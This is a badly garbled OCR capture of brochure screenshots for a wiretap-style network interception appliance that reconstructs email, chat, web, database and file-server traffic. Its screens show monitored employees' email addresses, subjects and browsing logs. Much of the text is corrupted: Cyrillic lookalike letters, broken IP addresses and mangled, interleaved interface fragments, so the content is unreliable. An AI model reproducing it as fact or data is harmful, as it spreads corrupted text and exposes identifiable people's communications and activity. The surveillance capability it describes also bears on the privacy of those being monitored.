4 m 20120197 1921681170 а 313131313131 192.168.1.131 
5. п 20120107 1921681170 за 313131313131 192.168.1.131 
e. m 20120107 1921681170 sa 313131313131 192.168.1.131 
т. m 20120107 19241684470 sa 313131313131 192.168.1.131 
з. п 20120107 19214681170 sa | 313131313131 192.168.1.131 
а п 20320107 1921681170 sa 313131313131 192.168.1.131 
10. в 20120197 1921681170 sa | 313131313131 192.168.1.131 
11. 20720107 192.168.1.170 sa 313131313131 192.168.1.131 
12. m 20120107 151681170 sa 313131313131 192.168.1.131 
«123456789 »»EnterPage| | Go | 


Server* DB Name 


de 


de 


de 


de 


de 


de 


de 


de 


de 


Command 


Insert into pop3 ( FROM, ТО, СС, ВСС, SU. 


Select count(*) From pop3 
use de 


Set textsize 64512 


Insert into pop3 ( FROM, TO, CC, ВСС, 50... 


Select count(*) From pop3 
use de 


set textsize 64512 


Insert into pop3 ( FROM, TO, CC, BCC, SU... 


Select count(*) From pop3 
use de 


set textsize 64512 


MSSQL 
MSSQL 
MSSQL 
MSSQL 
MSSQL 
MSSQL 
MSSQL 
MSSQL 
MSSQL 
MSSQL 
MSSQL 
MSSQL 


Whols ^ 


Similar 
Search 


АйАдйддддддддддди 


Every Page :| 20 


DB Type 


Total 872 Total Page 44 Current Page 1 


)orts Database Logging - MySQL, MsSQL, Oracle etc Database Comman 


Interception points must contain the Database commands packets. 


ample: Unknown Traffic Analysis 


No. [Г] Date-Time Src IP Dst IP Src Port Dst Port Src MAC Dst MAC Size Packets Protocol ^ 
= 2003-01-01 
1. 00-20-55 192.168.1.12 192.168.88.5 63578 161 00:1А:80:5С:5В:ПЕ 00:50:7F:29:58:11 120B 4 UDP 
- 2003-01-01 
2: 00:20:55 192.168.1.50 192.168.1.255 138 138 00:16:67:00:3C:56 EEEEEEFETEFE 402B 4 UDP 
2003-01-01 
3. ^ 192.168.1.12 192.168.1.60 TT3T 443 00:1А:80:5С:5В:ПЕ 00:0А:12:03:06:В7 K 8 TCP 
v INKNOWN-20030101| ompatibility Mode 
4. s Page Layout Formulas Data Review View 2 :b/:pu- ——- - - - - - - - 
[General M {1 Conditional Formatting - || "= Insert ~ | File Download _ 
5 EE] = $-*5| 138 Format as Table ~ 3^ Delete ~ à д 
| 588 528 E} Cell Styles ~ FEY Format - || 27 Eris ike: у а 
b Се Editing Do you want to open or save this file? = 
6. 
E F G H | А ЕЗ : Мате: UNKNOWN-20030101.xls 
DPORT МАС DMAC PACKETS SIZE(Byte) PROTOCOL № | 
Т. Ы Type: Microsoft Office Excel 97-2003 Worksheet 
2003-01-01 00:19 192.168.1.12 — 192.168.1.60 443 00-1А:80-5С-5В: 00:0A-12:03:06:87 1513 ТСР 
2003-01-01 00:19 192.168.1.12 192 1681.60 443 00:1А:80:5С:5В: 00:04:12:03:06:87 2441 ТСР From: 192.168.1.60 
8 2003-01-01 00:19 192.168.1.12 — 192.168.1.60 443 00:1A:80:5C:5B: 00:04:12:03:06:87 1593 ТСР 
Я 2003-01-01 00:19 192.168.1.12 192 168.1.60 443 00:1A:80:5C:5B: 00:04:12:03:06:87 1545 TCP 
2003-01-01 00:19 192.168.1.12 — 192 168.1.60 443 00-1A:80:5C-5B: 00:04:12:03:06:87 1545 ТСР Sa 
9 2003-01-01 00:19 192.168.1.12 — 192.168.1.60 443 00:1A:80-5C-5B: 00:0А:12:03:06:В7 1353 ТСР 755. Ореп pave 5 
- 2003-01-01 00:19 192.168.1.12 192 168.1.60 443 00:1А:80:5С:5В: 00:04:12:03:06:87 1401 ТСР -90. 
2003-01-01 00:19 192 168.1.12 192 1681.60 443 00:1A:80-5C-5B: 00:0А:12:03:06:В7 1321 ТСР 
2003-01-01 00:19 192.168.1.12 — 192.168.1.60 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1385 TCP 
10. 2003-01-01 00:19 192.168.1.12 192.168.1.60 443 00:1A:80:5C:5B: 00:04:12:03:06:87 1401 TCP 
2003-01-01 00:19 192.168.1.12  192.168.1.60 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1534 TCP => Jefi ; | 3 
2003-01-01 00:19 192.168.1.12 192 168.1.60 443 00:1A:80:5C:5B: 00:04:12:03:06:87 1518 TCP РЭ | м files from im c — nme a a 
11 2003-01-01 00:19 192.168.1.12 — 60.251.127 .208 443 00-1A:80:5C:5B: 00:50:7Ғ:29:58:11 1534 ТСР а А АНИ 
" 2003-01-01 00:19 192.168.1.12 — 192.168.1.60 443 00:1A:80:5C:5B: 00:04:12:03:06:87 3865 ТСР ”  savethis file. What's the risk? 
2003-01-01 00:19 192.168.1.12 — 192.168.1.60 443 00:1А:80-5С-5В: 00:0A-12:03:06:87 2505 ТСР 
12 2003-01-01 00:19 192.168.1.12 192 168.1.60 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 2361 TCP 
- 2003-01-01 00:19 192.168.1.12 — 192.168.1.60 443 00:1A:80:5C:5B: 00:04:12:03:06:87 4401 TCP 
2003-01-01 00:19 192.168.1.12 192.168.1.60 443 00:1A:80:5C:5B: 00:04:12:03:06:87 1449 TCP 
2003-01-01 00:19 192 168.1.12 192 168.1.60 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1417 TCP 
13. 2003-01-01 00:19 192.168.1.12  192.168.1.60 443 00:1A:80:5C:5B: 00:04:12:03:06:87 2297 ТСР :80:5С:5В:ПЕ 00:0А:12:03:06:В7 1.59K 1 TCP 
2003-01-01 00:19 192.168.1.12 192 168.1.60 443 00:1A:80:5C:5B: 00:04:12:03:06:87 2345 ТСР 
2003-01-01 00:19 192.168.112 — 192.168.1.60 443 00:1А:80-5С-5В: 00:04:12:03:06:87 2329 ТСР 
14. 2003-01-01 00:19 192.168.1.12 192 168.1.60 443 00:1A:80:5C:5B: 00:04:12:03:06:87 1545 TCP -80-5C:5B-DE 00:0А:12:03:06:В7 231K 7 TCP 


- 


Total 174 Total Page 9 Current Page 1 


: Turn on Unknown Capturing Module if necessary. Default is turn off. 


Admin: System Access Authority 


Assiqnment 
ority - Visibility and Operation in Group (with User defin 


Authority - Visibility 


Visibility group name : 


Default rules 


© Allnon-visual 9 All visual 


The following exceptions 


NoVisual recorded project agreement 

POP3 r |] SMTP 

F] WEBMAILR ГІ MSN 

Mica под 

5КУРЕ IRC 

F| GOOGLETALK E Б] НТТРРАСЕ 
ГІНТТРҒІШЕ Б) HTTPRECONSTRUCT 
РТР Р САМЕ 


TELNET 
NoSet visibility IP Add Delete 


3 


Groups wit 
Users 


Authority 5. алаш» 


NoVisibility search function 
RECORD 

ACCOUNT 

F] FULLTEXT 

DATA 

ASSOCIATION 


' ]NoVisibility report function 


STATISTICS 


P| SCHEDULE 


NoVisibility system set 


| NETWORK 


-| INFORMATION 


SERVICE 


T |ACCOUNT 


BACKUP 


| SYSTEM 


ONLINE 
NOTIFICATION 


NoSet visibility Account Add Delete 


Storage Reset 


Add Time 
2008-12-19 11:44:16 
2009-02-02 18:24:07 
2009-02-02 18:32:58 
2009-02-02 18:33:19 


User group name 
Administrator 
Technical 


Finance 


Logistics 


Authority - Operation 


Operation group name : 
Perform rules 


Read only recorded record 
Can read recorded content 


[ш] 

[Г] 

E Can read set content 

E Can read and write(Delete,setting ...) 


Storage | Reset | 


Functions 
Add User Delete 
Add User Delete 
Add User Delete 
Add User Delete 
Total 4 Total Page 1 Current Page 1 


Export & Backup - Auto (by FTP) 


and Manual 


@ please check hd!. 


@ Please ensure you have at least 700 MB free in HD 


Time : Hour Day Month Week 
ы X ж j X Delete * Г] Directory Name Size 150 
- а 20081013073401 11M 
Status : Stop © Start Select Directory : 
x Г] 20081012204148 46M 


X * E 2008010162532 25M 20081010162532 20081010162532 iso (2008-10-13 09:31:10) 


Auto (with 


{2 FTP Login Information 


О 


iv; POP3 7! SMTP М IMAP М WEBMAIL-R 
iz; WEBMAIL-S 9) MSN м ка V YAHOO 
басо Calsgories и QQ @ UT i4; SKYPE @ IRC 
i; GOOGLETALK м FTP М Р2Р V GAME 
Categories : |//РОРЗ 4| SMTP УМАР @ HTTP-L т HTTP-C 9| HTTP-D @ VIDEO STREAM 
V] WEBMAIL-R V|WEBMAIL-S V|MSN 9! TELNET 
ўса V| YAHOO v|QQ 
м ит V|SKYPE УКС 
ее Ж =a т — 
У] GAME V|HTTP-L УЈНТТР-С 
VI HTTP-D УІ VIDEO STREAM УІ TELNET Ө Please use FTP software to download the Backup ISO image ! 
Please use 'admin' as FTP login account. 
7] Delete the backuped recording data which expired | 1| days. 


150 File : ” 


CDROM/DVD: Optiarc DVD RW AD-7530B ~ 


[Bun | 


FTP) Back 
) m Manual Backup 


aU C Download ISO or Burn in to CD/DVD 


Ftp Host : 

User : 

Password : 

Port Number : 
Directory : 
Backup Record : 


© ON ^ ОБЕ 


192.168.10.50 


decision 


=== Reserved Raw Data Files and 


21 


ст” - Backup Reconstructed Data 


Download 


трити 7 Comes with Hashed Export 


Function 


Alert and Notification - Alert with 


914 
а Alert List 


Create a New Alert 


€&2POP3 Key Word is СЕО. Managing Director, Gen Fw to: frankie@ed-system.sg 


XD SMTP Key Word is Price list.xls 


I«1»» Total 2 Total Page 1 Current Page 1 
[| @ npsu;1s2109.10urgeneraucommorynouncauoryruee earcpnp - winaows internet схрюгег E * БР wg E = 
Create a New Alert - 
Alert Parameters Forward to в 
POP3| Sender ~ Time is: 08 ~ : 00 ~ ~ 17 +: 00 ~ OAllow © Deny , Alert configured 
IMAP Sender X Time is: 08 ~ : 00 ~~ 17 У : 00 ~ Allow ©) Deny 2 f d Iff t 
SMTP Key Word ” price Time is: 08 у: 00 ~~ 17 У ; 00 + Allow ©) Deny|frankie(Qed-sysem.sg / ГО ГП | e re n 
WEBMAILR| Sender + Time is: 08 ~|: 00 ~~ 17 ~|: 00 ~ (Allow © Deny G service 
WEBMAIL-S Sender ” Time is: 08 > : 00 ~~ 17 v : 00 ~ Allow ©) Пепу £ 
MSN| User Account ~ Time is: 08 -:00-- 17 ~ |; 00 > O Allow @Deny Г t g | d 
YAHOO] User Account ~ Time is: 08 ~ : 00 ~~ 17 ~ : 00 ~ (Allow © Deny ГЕ categories an 
ICQ| User Account ~ Time is: 08 ~ : 00 ~~ 17 ~ : 00 ~ ОАНом © Deny ( d iffe re nt 
QQ} User Account ~ Time is: 08 ~ : 00 ~~ 17 *: 00 ~ Allow ©) Deny 4 
UT| User Account ~ Time is: 08 У ; 00 ~ ~ 17 ~ ; 00 ~ Allow © Deny , ра га mete rS suc h 
SKYPE| User Account + Time is: 08 ~ : 00 ~~ 17 +; 00 ~ Allow © Deny А 
GOOGLETALK| User Account ~ Time is: 08 У : 00 *- 17 *: 00 ~ Allow ©) Deny , а5 кеу WO rd П 
| IRC| User Account ~ Time is: 08 ~ : 00 ~~ 17 ~ : 00 ~ (Аном © Deny / Alaccegmbearsent to 
FTP| User Account ~ Time is: 08 ~ : 00 ~~ 17 ~ : 00 ~ Allow ©) Deny # , в 
Р2Р Р Y Time is: 08 у: 00 “~ 17 +; 00 ~ (О Аном © Deny , Administrator by 
САМЕ ІР T Time is: 08 +: 00 ~~ 17 ~ ; 00 ~ ОАНом © Deny Ц k а 
HTTP-L IP M Time is: 08 ~ : 00 ~~ 17 +; 00 ~ Allow © Deny [| Email OF SMS (if 
HTTP-C| ІР M Time is: 08 у: 00 ~~ 17 ~ : 00 ~ ОАНом © Deny # в 
т.т m - TEN VON VAN RUN WIS "| SMS Gateway 15 


available). 


Throughput alert function is also available! 


Search - Free Text, Condition, 


е Й 
= 


Complete Search - Free Text Search, Conditional Search, 
Similar Search and Association Search 


46 https://192.168.10.60/ - Search АП - Windows Internet Explorer ИШИП | місе А ee) 
Search Parameters Search Category History Query 
Date: %- 2 
Тіте: T: T МЕ T All 
Source IP : 
Email Address - = ФФ 
Subject (M Senier И NCC MECC Sa [Г] © Date-Time Account Sender Receiver cc Subject Size 
ul М 
Webmail Type - = за F 1. Е 2008 07 РАМКИ decision@ed-system s РЕИНА 4 зирроп@ей. £ м MY Email мок |Т, 
FTP Server : 
Ф 2008-07-02FRANKIE- , . _. B moe 
FTP ке: | _ @ 10-34-19 РС  decisionged-system.s support@ed-system.sg £3 I Captured 9874K ГО 
5 z 2008-07-02FRANKIE- в 
P2PFile.| ғ 0 10-34-17 PC decision ed-system.s decision@ed-system.s support@ed... (3 MY Email мок M 
Game Мате: Е M Ф ЕЕ: decision@ed-system.s VOD NBN £y I New York 7937K [A 
MSN Account = b № =  2008-07-02FRANKIE- B В НАЯ 
[User Handle © Participants 5: 102843 рс  "edetective2Qhotmail... Support@ed-system.sg асе usok ГА 
— 2008-07-02FRANKIE-, a в a 3 
enmt E " 6. 102843 рс  fankiedecisionggma... gecision@ed-system.s... £3 I Bush 724K [A 
(User Handle © Participants d: 9 2008 07 Q2 FRANK transyinmy@yahoo com MEER Р а гл Prospectors strike gold at | 122.06K [a 
Џ 
Yahoo Account : 2. з 8. Р] Онар frankie frankie@decision.com.. Е азан сот... decisionge. О t4 COLOMBEY-LES-DEUX-EGLISES...114 35K. ГО 
(User Handle F Participants 
2008-10-12 a 
белиш h " 9. 0 20:46:53 frankie frankie@decision.com decision@ed-system.s support@ed... 17 Europe - Econ Crisis 158.22K T 
Й Бі. жеке rene тү EE - = , 2008-10-12 B 
ae gru Е ТЕ 10. 1870 46:53 frankie frankie@decision.com.... Fankie@decision.com... decisionge 2% à COLOMBEY-LES-DEUX-EGLISES...114 37K. ГА, 
= == = 1 
та 2008-10-12 в ынасы Ж — REY ope - Econ Crisis 158.18K ГО || 
@KEYWORD OIP OACCOUNT (9 By Account : VIC-TEST m 


C О n d it [ О n е " | Seen ud EET E = аттын dre АЕ 
Search om Free Text 


Timer Categody Briefly Functions Association Account 


2008-05-21 145400 ЧФРОРЗ | Subject Re: NormalE02-1.4.0.... jimmy@decision. сот мг Search Account 
2008-05-21 15:02:35 ФРОРЗ Subject: Database Backup (32) Association jylin@decision.com.tw Search Account S e а) rc h 
2008-05-21 15:32:38 ФРОРЗ Subject: Re: Norma-ED2-1.4.0-... lunko@decision. com.tw Search Account 

2008-05-21 15:34:13 @ATTPLOG — stats.update. microsoft.com neoyuxxx@decision, com.tw [__Search Account] 


2008-05-21 15:36:43 SMTP | Subject Re: Normal- ED2-1.4.0-... ы UU RESO 
2008-05-21 15:53:50 ФРОРЗ Subject: Re: Normal-ED2-1.4 0- Association 


m m 
20080521 155437 Фемт | Subject Re: Nomak ED2-1.4.0-.. Association IP © е О С || r | ti О n 
2006-05-21 16:10:17 ФРОРЗ $ Re: Serial Number Req Association 


“ 


Subject 
2008-05-21 16:10:18 ФРОРЗ Subject: Re: Norma-ED2-1 4 O-... Total 0 Total Page 0 Current Page 1 
2008-05-21 16:11:17 мтр Subject: Fw. Serial Number Вед [ Association.) 
2008-05-21 16:38:19 мтр Subject: Re: Serial Number Req... e а ГС 
2008-05-21 16:38:21 ФРОРЗ 2 Asus МССНОСЕВИЯ Association 
у woe Si 4 | ШСЕ 7 
20080521 17:21:21 ФРОРЗ Subject: R rial Number Req 192.168.1.237 


2008-05-21 17:28:54 Фетр | Upload: raw. eth 1211356666 яғы 


«123456789 »» Total 563 Total Page 38 Current Page 1 12790125 


File Checksum (Hash) - Check File 
ое: Ши rit 


(Browse. ][Ubload | FileName ;TUT186-Forensics pat [безе | Every Раде | 20) Confirm | 


No. File Name Extension Count Size Search 

1 ni-ieee.pdf pdf 1 334.83К e. 

2 network forensics on pack... pdf 1 240.91K а, 

3 TUT186-Forensics.pdf pdf 1 884.64K а 

4. 040952 раҒ рағ 1 460 .29К e. 

5 Hornyvalley.com Hardcore ... rar 1 33.63M e. 
и«1» Total 5 Total Page 1 Current Page 1 


Eve Page | 20) Сопіт | 
No. File Name Extension : ize Search 
1. TUT186-Forensics.pdf pdf 1 884.64K е 
и«1» Total 1 Total Page 1 Current Page 1 


Shows the file lists and user can import files to check and compare 
with the files that 
has been captured by the system. 


Compare file content integrity. Abuser might have changed file 


Bookmark Function (for Review & 


QeoO (s (ec ове (cO 
ЕН 


Retrieval Later 


Date 


Receiver 


B 
frankie@ed-syst 
B 
flyy@decision.c 


vic@decision.co.. 


vic@decision.co 


- vic@decision.co 


vic@decision.co 


vic@decision.co 


frankie@decisio 


2009-02-02 18:43:34 
2009-02-02 18:43:19 


BookMark | Ж Delete | & Search | ;SAccount List 
management 
) Date-Time Account Sender 
Close 
2009-02-02 internet- . - 
1. E 11:05:38 forens... _ /annie@fkyong.c 
2008-09-22 5 ғ 
2. m % 10.0247 VIC-TEST frankie@decisio 
з Г] @ т VIC-TEST lunko@decision 
2008-09-22 is 
4. Г] @ 10-0247  VICTEST lunko@decision 
5. © @ porre FLYY | мпсетуао@адес! 
2008-09-22 Е 5 
6. Г] 8 ‘(9.0641 192-168.1.1424псетіуао десі 
2008-09-22 ; 3 
T. Г] 0 09-04-58 VIC-TEST vincentyao@deci 
2008-09-22 кр 
8 [10 09-3245  VIC-TEST flyyGdecision.c 
мч 123 њм Enter Раде | || бо | 
No. Remove Export 
1 x e 
2 x e 
i «1» 


cc 


vincentyao 


decision@d 


decision@d 


decision@d. 


vincentyao 


Name 
decision 
singapore 


Total 2 Total Page 1 Current Page 1 


decision 


Ce 


Every Page 

Subject Size Simila Whois 
Е) 17 (3 Re: Letters 98 40K Ist a 
С) E гё] RE: Issues still exist 48418K [Qj ч 
@ у 17 t Fw: O4other informatio... 932 66K [Cl а 
@ & m Fw: O6block Копљ-ан О... 103M A 2, 
Е) 17 га 58 БН, 87.10K ГД а 
ем ЕВА 8636к AM d 
ЕЗ ЕЭ 8635K A 8% 
B 17 А RE: Issues still exist 48925K A 


Total 20 Total Page 3 Current Page 1 


Export ISO Name 


Bookmark items and allow the review of 
the items. Bookmark items can also be 


Reporting - Network Service Usage - 


Dail 
Network Services Usage Report 


HTTP Download:4,06% 
MSN:8,63% 


00:3,2% _ р 2. 
Vl Drill Down Reporting Capabilities 
HTTP Content:32,91% UT:10,696 


. Әнттр Link | Ж Delete | & Search Every Page:[ 20)| Confirm | 
HTTP Link:33,66% No. 0 Date-Time Account HOST similar” Whols 
1 2009-08-29 22:16:55 123 Seednet Webmail Га, а 
2 Г 2009-08-29 22:16:52 123 Seednet Webmail д а 
3 2009-08-29 22:16:52 lunko Welcome to ICQ а a 
4. 2009-08-29 22:16:51 123 Seednet Webmail ГА а 
5 2009-08-29 22:16:50 lunko ICQ Inc.- Welcome! wi a 
6. 2009-08-29 22:16:49 lunko welcome.icq.com ГА, d 
7 2009-08-29 22:16:49 lunko C.icq.com Га, a 
8. Г] 2009-08-29 22:16:48 123 Seednet Webmail д a 
9 [Г] 2009-08-29 22:16:48 peter YouTube - Mini-Z AWD Commercial га, EN 3 
10. 2009-08-29 22:16:47 123 Seednet Webmail [A а || 
11 7] 2009-08-29 22:16:47 123 Seednet Webmail Га, a 
12. 2009-08-29 22:16:47 123 webmail.seed.net tw га, 4 
13. 2009-08-29 22:16:46 peter YouTube - Broadcast Yourself. га 4 
14. 2009-08-29 22:16:44 123 Seednet Webmail д a 
15 [Г 2009-08-29 22:16:43 peter YouTube - Broadcast Yourself. [a a 
16. 2009-08-29 22:16:41 peter YouTube - Broadcast Yourself T а 
17. 2009-08-29 22:16:39 123 Seednet Webmail Га, a 
18. 2009-08-29 22:16:39 peter YouTube - Broadcast Yourself. Га, a 
19. 2009-08-29 22:16:37 peter YouTube - Broadcast Yourself. а a = 
20 м 2009-08-29 22-16-36. lunka сап atwola cam [a a 


M« 123456789 мм Enter Раде Go Total 57,795 Total Page 2,890 Current Page 1 


Reporting - Network Service Usage - 


Weekl 


Network Services Usage Weekly Report 


Drill Down Reporting Capabilities 


2009/08/27 2009/08/29 


ЗЭНТТР Content | Ж Delete | А Search — Every Раде: 20][ Confirm 
Network Service Usage Weekly Report No [Г] Date-Time Account Content Similar Whols ^ 
HTTPPAGE 21 2003-08-29 222241 peter силл freeworldgroup.com A а 
60,000 — 2 Ш 2009-08-29 22:22:41 peter [ayn freeworldgroup.com m а 
23 Ш 2009-08-29 22:22:41 123 %РСпоте а а 
2 Ш 20908-29 22:22:41 123 (a%PChome f а 
50,000 4 2009-08-29 22:22:41 123 Ы PChome а а 
2009-08-29 22:22:41 123 E PChome а а 
2009-08-29 22-22-41 123 1 PChome а а 
40,000 4 2009-08-29 22:22:39 123 E 'bPChome а а 
2009-08-29 22:22:39 123 %РСпоте m а || 
Я 2009-08-29 22:22:36 123 9% РСпоте а а | 
30,000 4 2009-08-29 22:22:36 123 E&PChome а а 
2009-08-29 22:22:33 23 02820010907 а а 
Я 2009-08-29 22:22:32 peter Ef pagead2 googlesyndication.com д а 
20,000 -] 2009-08-29 22:22:32 peter E Advertisement а а 
Я — 2003-08-29 22:22:32 peter 19% радеач2 googlesyndication.com а & 
Я 2009-8-29 22:22:32 peter (a%Bugs Puzzle Puzzle Game - Play Free Flash Games Online - Youdagames.com ГА $ 
10,000 4 а 2009-08-29 22:22:31 peter Eb Advertisement [a a 
Я 2009-08-29 22:22:31 peter Advertisement fa а 
2009-08-29 22:22:31 peter (%pagead2.googlesyndication.com а ач 
ot r T т 1 7 T m 2009-08-29 72-22-31 neter Isl binanear? annalesundiratian com a СОМ 
2009/08/23 2009/08/24 2009/08/25 2009/08/26 2009/08/27 2009/08/28 М4 123456789 »m Enter Page Go Total 56,971 Total Page 2,849 Current Page 2 


Reporting - Top Websites Viewed 


Top Web Sites 
Weekly | Summary | 
Web Server URL Count 
1 p4uhinet net 16,698 
2  mailpchome.com.tw 3,305 
3 522002 webmail hinet net 3,243 © ТР oO ACCOUNT Top Web Sites (Тор N) 
4  sg2000.webmail hinet net 2.000 = 
т ши ы 1794 IP | Count | User Behavior 
192.168.1.3 Relations 9,660| Daily Usage | Weekly Usage | 
6 |улш5 ші соті 1.794 192.168.1.10 7,075| Daily Usage | Weekly Usage | 
7  |glal03.mail 163.com 1,725 
8  www.slime.com.tw 1,587 
9 \mp.sina.com.tw 1,518 
10 pagead2.googlesyndication.com 1,380 TOPN Relationship between Account and IP 
11 webmail seed net tw 1380 ТОРМ№ Айген 
12 |www.google.com.tw 1362|  TOPN — 
13 [tw-youtube.com 1,311 TOPN 
14 www.flickr.com 1,310 ТОР М 
15 бу.гојоху.пе! 1.104 ТОР М 
16 Њу. шеззепеег yahoo.com 1.104 ТОР М 
17  бузшаауе5 сот 965 TOP N @ Internet| Protected Mode: Off а Ro% v 
18 www.freeworldgroup.com 828 ТОР N 


Reporting - Online IP - Account Lists 


Visibility Group : ALL - 
Online IP List | Add/Delete | Set IP. | Import/Export IP | Skipped IP List | Search | Account Detection | Mail Report [ЕШ : 0| Every Page:| 20|| Confirm | 
No. [Г] Client Search Server Search PC Name Account Last Connection Time ^ 
1. Ej | [s Q kk DECISION-CASPER 2011-07-27 15:05:14 
21 a 7150. Q C, zi 116.14.50.39 2011-07-26 16:12:03 
3. m 8 211.21.62.67 С, C, = 211.21.62.67 2011-07-26 16:29:33 
4. n e 1$ 46.137.134.188 C, с, =“ 46.137.134.188 2011-07-26 16:12:49 
5. E % 114.108.252.1 С 
6. E © %210.66.39.1 
7. m 3827.240.107. | 
8 m e 3 204.236.166 otal Throughput Statistical Report >> 192162. gy TELNET [Mon Statistical 
г; =a 2 à d Back 
9. т а %118.161.240. 
es 2011-07 192.168.1.2 Throughput Month Statistical €Last Month & Next Month Mail Report 
10. г 1$ 149.13.32.2 „а m 
11. Я % 124.108.79. т Quantity Throughput Report 
12 %60.251.127.2 Total 1751 148080KB _ Mh. 
i a: Ф РОРЗ окв 
13. Е %60.251.127.4 МАР окв 
14. 1$ 192.168.1.1 ESMTP SER 
u Га Webmail(Read) 0 KB 
15. = 3 121.205.59. B Webmail (Sent) 0 KB 
16 г %116.15.90.4 Ra MSN 0KB 


«12345 »»EnterPage| | Со | 


іса 
УЗ YAHOO 
A oa 
= SKYPE 
UT UT Chatroom 
© GOOGLETALK 


Ж IRC Chatroom 


0 
0 
0 
0 
0 
0 
0 
0 
0 
1 
0 
0 
0 


0 KB 
0 KB 
0 KB 
19 KB 
0 KB 
0 KB 
0 KB 


Reports - Daily Excel Log Report 


(са) ы ) = 20110727 [Compatibility Mode] - Microsoft Excel m | = | @ _х 
ы Ноте Insert Page Layout Formulas Data Review View Nitro PDF Professional @-o x 
22. CouierNew ~ 12 ~ ДА, = = > Ep Wrap Text General ” | Hh a i ESE $ 
D са Я = = = | а C E 1% z 3 em ER EHI 3) di 5 27 A 
+ || || Op + - - - - 9 0 .00| nal п | n | ri 
зле у [Вог E(B E ЕМ Mere Center || НИЯ |В || condana! тоғы С amet Delete Toma о cear- ата Pind a 
Clipboard ™ Font Га Alignment Га Number Га Styles Cells Editing 
Al М Ж. Category Y 
H 1 J K 
2 276569 КВ 1425 382912 кв|_ 1425 382912 КВ = 
| 3 л. ЗЬ. 20110727 [Compatibility Mode] - Microsoft Excel | Е 4 eis 
4 Insert Page Layout Formulas Data Review. View Nitro PDF Professional ©- "x 
5 mew = 
Ф = “ГА | [= = = = d ! р ш т >: Autosum * А n: 
6 д. Arial 10 Ал = | V| Er Wrap Text General Ti 5557 | == ew A n ме 27 dà i 
[ "a y ви [А ze o = ЕН MN ur тане ан | - _- - |2оа- Fiere зе 
8 Clipboard ™ Font fa Alignment fa Number Га Styles Cells Editing 
3 | Al - Ж | Date [v| 
10 H 
11 | B 
12 27/7/2011 15:04 |192 168.1.33 |ћуу |[May Infected] Mail delivery failed: returning message to sender 
13 27/7/2011 15:04 |192.168.1.10 Fwd:Fw: 025сһооіроіісе- 4% isk ЕН ЈЕ M 
27/7/2011 14:50 |192.168.1.33 i i d Fw: 04other information-A #3 A #8 M 
14 27/7/2011 14:50 |192.168.1.33 4 БЕ ДЕЕ ЕТ 
15 27/7/2011 14:50 |192.168.1.33 ) НЕЗ Р) 
|| 16 27/7/2011 14:50 |192.168.1.33 А ig а Fw: 05Тһозе arrested-5 ЕЕЕ ir 
| 27/7/2011 14:50 |192.168.1.33 d а Fw: 01попћегп lights found 25438728 ЖЕ Р! 
17 9 | 27/7/2011 14:50 [192.168.1.33 Fw:05Those arrested-75 E 8 te 
18 10, 27/7/2011 14:50 1192 168.133 уу Fw:06block from- RFA PB HR ЕЕ SRI ЈЕ (лг 
19 11, 27/7/2011 14:50 |192.168.1.142 |peter RE alist Р) 
12| 27/7/2011 14:50 |192.168.1.142 [peter |[Bug En ELI IEE sniff mod ASSIS tet FLIES ARP OOO ANRE 
20 13, 27/7/2011 14:49 |192.168.1.10 мс ЕЕ ЕЕЕ ЕЛ 
21 14, 27/7/2011 14:49 |192.168.1.10 мс SRE alist Р) 
22 15, 27/7/2011 14:49 |192.168.1.33 [йуу FWD: 05Тһоѕе arrested-75 EREE Ly 
16 _ 27/7/2041 14:49 |192 1681.33 FWD: 02School police- RESHMA 2 Pt 
23 17, 27/7/2041 14:49 |192.168.1.33 FWD: 04other information-2a 878 8138 jr 
24 18, 27/7/2011 14:49 |192.168.1.33 Fw: 05Those arrested-75 EREE PI 
25 19 27/7/2011 14:46 |192.168.1.10 Fwd:Fw: O1northernlights found Z #788 ЖЕ lec 
20, 27/7/2011 14:43 |192.168.1.10 мс RE: Issues still exists on EDDC 
26 204 21| 27/7/2011 14:43 [19216819 — |lunko [х-5рат <> > НЕ 
27 22 271712011 14:43 |192.168.1.9 <9/22 АЎ FR ANNA SUISSE ЕТ 5ml = Ж У 3999» СагР!ап НЕ» 269 йт 10072 e t UU ER 
| 28 23 27/7/2011 14:43 |192.168.1.9 ВЕЗЕ Alpi 
M 4 M; Summary <POP3 ," IMAP | SMTP | Webmail (Кега|| 24 27/7/2011 14:43 [192.168.1.9 Попко ЕЖЕЛИ Р) 
Ready 25 27/7/2011 14:43 |192.168.19 |Ішпко Fw: 04other information-Z& # Е #138. M 
= = —— 26, 27/7/2011 14:43 |19216819  |lunko Fw: 06block from-t RFH ВЕН YE sel ЈЕ M 
27, 27/7/2011 14:43 |192.168.1.9 |шпко 3listtesti C 
28 _ 27/7/2011 14:43 192.168.1.9  |lunko C 
29 _ 27/1/2011 14:43 |192.168.1.9 |шпко C 
30, 27/7/2011 14:40 |192.168.1.33 Туу Fw: O6block ігот- aş h PIH ЕЕ M 
31, 27/7/2011 14:40 |192 1681.33 |һуу Fw:01northern lights found 25878089 H 
32, 27/7/2011 14:38 192.168.133 |һуу |[May Infected] Mail delivery failed: returning message to sender 
33 27/7/2011 14:37 |192.168.1.10 мс Fwd:Fw: 025сһооіроіісе- 4% Қ) #8718 ІМ 
34, 27/7/2011 14:24 |192.168.1.33 Fw: 04other information-A 3 А #8 M 
M 4» M| Summary | РОРЗ __ IMAP Webmail (Read) | Webmail (Sent) IQ / YAHOO 00, КР 
Ready lE роо) 


2) 


EB 


Wireline Ethernet 
Interception & Real-Time 
Reconstruction Series 
Е-реТеС ни" а Guard 
System (ED-GS) 


DECISION?/ /2 
=a 


Introduction to ED-GS: For 


pi d - 


> Enterprise Protection from Confidential 
Business Data Breach 
> Intranet Deployment at Gateway of 
Network Segment of Server Farm 
> Monitor Transactions of Heterogeneous Databases 
(MySQL, MS SQL, Oracle DB, DB2, Sybase) 
> Monitor File Access Activities of File Servers in MS 
Network (CIFS) 


> Monitor Internal Email Activities (POP3, SMTP, 
IMAP) 


> Transaction Record Provided for Audit 


> Personal Data Protection Mandates 
Fulfillment 


Introduction to ED-GS Features 


> DB Monitor on Transactions of MySQL, MS 


SQL Server and Oracle DB 


* SQL Command and Action Record with DB Name, User 
Account of Network and DB, User IP, Date/Time Stamp 


> Internal Email Activity Monitor & Audit 


> Email Content with Sender, cc & bcc List, User IP, 
Date/Time Stamp and Attached Files 


» Access Record and Audit of File Server 


> File Access Record with User Account, IP, File Server 
Name, Action, Date/Time Stamp 


